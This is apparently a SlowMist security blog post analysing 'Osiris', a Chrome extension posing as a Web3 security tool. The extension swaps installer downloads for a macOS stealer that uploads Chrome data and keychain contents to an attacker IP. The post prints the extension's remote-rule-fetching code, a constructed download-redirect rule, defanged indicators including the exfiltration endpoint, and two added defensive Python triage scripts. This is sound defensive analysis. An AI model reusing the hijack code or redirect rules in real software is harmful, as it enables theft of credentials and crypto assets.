A Wolf in Sheep’s Clothing: Analysis of the Osiris Malicious Browser Extension
Author: Thinking
Editor: Liz
Background
Earlier today, a user on X, @0xmaoning, reached out to the SlowMist security team for assistance after discovering suspicious behavior in a browser extension called “Osiris.” The extension, posing as a Web3 security tool, appeared highly deceptive — so much so that the user nearly fell victim. He hoped we could help investigate the threat and prevent others from being affected.
Following an in-depth analysis by the SlowMist security team, we confirmed that the Osiris extension is indeed malicious. It silently replaces legitimate download links with malicious ones, tricking users into downloading and installing harmful software, which can ultimately lead to the theft of their crypto assets.
We would like to extend our sincere thanks to X users @0xmaoning and @Onefly_eth for their timely reports and valuable clues, which played a key role in uncovering this threat and preventing further victims.
Related Attack Information
Malicious browser extension on Chrome Web Store:
https[:]//chromewebstore.google.com/detail/osiris/leegjgppccbgnajpjgijlhplefgpnmdf
Malware download URL:
https[:]//osiris.vip/registrartionusersuccessfully.php?type=dmg
Malicious website:
https[:]//osiris.vip/
Malware data exfiltration endpoint:
http[:]//192.124.178.88
Phishing Technique Analysis
The attacker promotes the malicious “Osiris” extension on social media, targeting specific users. This extension disguises itself as a Web3 security tool that claims to help users identify Web3 scams, phishing attempts, and malware. In reality, it is designed for malicious purposes.
Malicious extension download address (Risk reminder: Do not interact with or analyze the following content outside of an isolated environment.):
https[:]//chromewebstore.google.com/detail/osiris/leegjgppccbgnajpjgijlhplefgpnmdf
Upon analyzing the extension’s code, we found it uses the chrome.declarativeNetRequest.updateDynamicRules API to dynamically configure network request rules.
Code Sample:
function fetchDynamicRules() {
    // "uid" is read from the extension's local storage and appended to the
    // rule request (compare the example request URL below).
    chrome.storage.local.get("uid", data => {
        const uid = data.uid ? data.uid : "";
        const uidParam = uid ? `?uid=${uid}` : "";
        // BASE_URL is defined elsewhere in the extension and points at the
        // attacker-controlled server that serves the rule set.
        fetch(`${BASE_URL}/security${uidParam}`)
            .then(response => response.json())
            .then(rules => {
                if (!rules || !Array.isArray(rules)) {
                    console.warn("Rules incorrect.");
                    return;
                }
                // Remove any earlier copies of the same rule IDs, then install
                // whatever rule set the server returned.
                const ruleIds = rules.map(rule => rule.id);
                chrome.declarativeNetRequest.updateDynamicRules({
                    removeRuleIds: ruleIds,
                    addRules: rules
                }, () => {
                    console.log("Rules updated", rules);
                });
            })
            .catch(err => console.error("Error fetching rules:", err));
    });
}
The network request rules are retrieved from a server controlled by the attacker.
Example request URL:
https[:]//osiris.vip/security?uid=aauyaxxsyd
Once these rules are fetched and applied via chrome.declarativeNetRequest.updateDynamicRules, any network request matching the pattern will be intercepted and replaced.
Rule Behavior:
- Matches all URLs ending in .exe, .dmg, or .zip
- Targets only main frame or iframe requests
- Replaces the matching request with a link to the malware
More about the declarativeNetRequest API:
https[:]//developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest
After installation, the attacker lures users to visit legitimate websites (e.g., the official site of Notion) and download an application. Once the download is triggered, the extension silently replaces the download link. Even though the browser download record displays the original, legitimate source, the file is actually a malicious program downloaded from the attacker’s server. This takes advantage of a display flaw in Chrome to deceive users.
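The following is an added triage example (not code from the Osiris extension or from SlowMist): it takes a declarativeNetRequest rule set in the JSON shape the API consumes, flags rules that redirect main-frame or iframe requests for installer files to another host, and approximates how such a rule would rewrite a download URL. The rule set is constructed to mirror the behaviour described above; it is not the actual payload served by the attacker's server.

```python
import re
from urllib.parse import urlparse

# Constructed sample, modelled on the behaviour described above (not the real
# payload served from osiris.vip/security): rule 1 redirects top-level/iframe
# requests ending in .exe/.dmg/.zip to the malware URL; rule 2 is a benign block.
SAMPLE_RULES = [
    {"id": 1, "priority": 1,
     "action": {"type": "redirect", "redirect": {
         "url": "https://osiris.vip/registrartionusersuccessfully.php?type=dmg"}},
     "condition": {"regexFilter": r"\.(exe|dmg|zip)$",
                   "resourceTypes": ["main_frame", "sub_frame"]}},
    {"id": 2, "priority": 1, "action": {"type": "block"},
     "condition": {"urlFilter": "||tracker.example.invalid",
                   "resourceTypes": ["script"]}},
]

INSTALLER_EXTS = ("exe", "dmg", "zip", "pkg", "msi")
NAV_TYPES = {"main_frame", "sub_frame"}

def is_download_hijack(rule):
    """True if a rule redirects navigation-level requests for installer files."""
    if rule.get("action", {}).get("type") != "redirect":
        return False
    cond = rule.get("condition", {})
    pattern = (cond.get("regexFilter") or cond.get("urlFilter") or "").lower()
    types = set(cond.get("resourceTypes") or [])
    return bool(types & NAV_TYPES) and any(ext in pattern for ext in INSTALLER_EXTS)

def would_redirect(rule, url, resource_type):
    """Approximate DNR matching (regexFilter searched against the URL); returns the replacement URL or None."""
    if rule.get("action", {}).get("type") != "redirect":
        return None
    cond = rule.get("condition", {})
    if resource_type not in cond.get("resourceTypes", []):
        return None
    pat = cond.get("regexFilter")
    if not pat or not re.search(pat, url):
        return None
    return rule["action"]["redirect"].get("url")

def triage(rules):
    """(rule id, redirect host) for every rule that looks like a download hijack."""
    hits = []
    for rule in rules:
        if is_download_hijack(rule):
            target = rule["action"]["redirect"].get("url", "")
            hits.append((rule["id"], urlparse(target).hostname or ""))
    return hits
```

A rule set pulled at runtime from a remote server, as this extension does, can be audited the same way by dumping the dynamic rules from an extension's storage or its network traffic and feeding them to triage().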
Malware Analysis
We analyzed the macOS version of the malware in this case.
Malware download address (handle only in isolated environments):
https[:]//osiris.vip/registrartionusersuccessfully.php?type=dmg
Once opened, the malware prompts users to launch the Terminal and drag the “Installer” into it.
In fact, this process executes Installer.kmo, which uses Base64 encoding to hide its malicious intentions. It also asks the user to input their computer’s password to gain elevated privileges and access sensitive data.
After decoding, we found that a bash command was used to run an AppleScript. This script was designed to execute the hidden file .Installer with the following logic:
- Locate the target volume: The script lists all mounted volumes and searches for one whose name contains “Installer”.
- Copy the hidden installer: It copies the hidden file .Installer from the volume to the /tmp directory and grants it execute permission.
- Execute silently: The copied installer is executed directly. The process is wrapped in a try block to suppress any errors, with no validation or user interaction required.
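As an added example (not part of the SlowMist write-up), the following scan looks for the artifact pattern this dropper leaves behind: a dot-file with the execute bit set, sitting on a mounted volume or in /tmp. It assumes a POSIX filesystem; the fixture it builds is constructed for the demonstration, and on a real macOS host one would point hidden_executables() at "/Volumes" and "/tmp".

```python
import os
import stat
import tempfile
from pathlib import Path

def hidden_executables(root, max_depth=2):
    """List dot-files under root that have an execute bit set.

    Descends at most max_depth directory levels below root. The Osiris
    dropper copies a hidden '.Installer' from the mounted image to /tmp and
    chmods it executable; a legitimate installer has no reason to hide its
    payload, so such files are worth triaging.
    """
    root = Path(root)
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        depth = len(Path(dirpath).relative_to(root).parts)
        if depth >= max_depth:
            dirnames[:] = []        # stop descending past max_depth
        for name in filenames:
            if not name.startswith("."):
                continue
            p = Path(dirpath) / name
            try:
                mode = p.lstat().st_mode
            except OSError:
                continue
            if stat.S_ISREG(mode) and mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                hits.append(str(p))
    return sorted(hits)

def build_sample_tree():
    """Constructed fixture: a fake mounted volume laid out like the dropper's image."""
    d = tempfile.mkdtemp(prefix="osiris_demo_")
    vol = Path(d) / "Osiris Installer"
    vol.mkdir()
    (vol / "Installer").write_text("drag me into Terminal\n")   # the visible lure
    hidden = vol / ".Installer"
    hidden.write_bytes(b"#!/bin/sh\n")                          # stand-in payload
    hidden.chmod(0o755)                                         # execute bit set
    (vol / ".DS_Store").write_bytes(b"\x00")                    # hidden, not executable
    return d
```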
After .Installer is executed, it collects and packages the user's Chrome browser data and keychain information, then uploads it to http://192.124.178.88. Once the attacker obtains this data, they may attempt to decode and extract private keys or mnemonic phrases associated with Web3 wallets, thereby stealing the user's crypto assets. Additionally, credentials saved in Chrome could be harvested, allowing the attacker to take over accounts on social platforms, crypto exchanges, and other services.
We have previously analyzed similar attack techniques. Interested readers may refer to our report Seeing Is Not Believing: Analysis of a Fake Zoom Meeting Phishing Attack.
Conclusion
In the Web3 world, opportunity and danger go hand in hand. Solutions or tools that claim to enhance “security” may actually exploit the user’s trust to launch attacks.
This so-called “security extension” hijacks download links and plants malicious code to steal users’ crypto assets and personal data. Some users have already suffered losses.
Therefore, the SlowMist Security Team issues the following recommendations:
- Do not install unfamiliar programs or browser extensions
- Be cautious about unsolicited tool or solution recommendations
- Use trusted antivirus software to strengthen local device protection
About SlowMist
SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring), SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.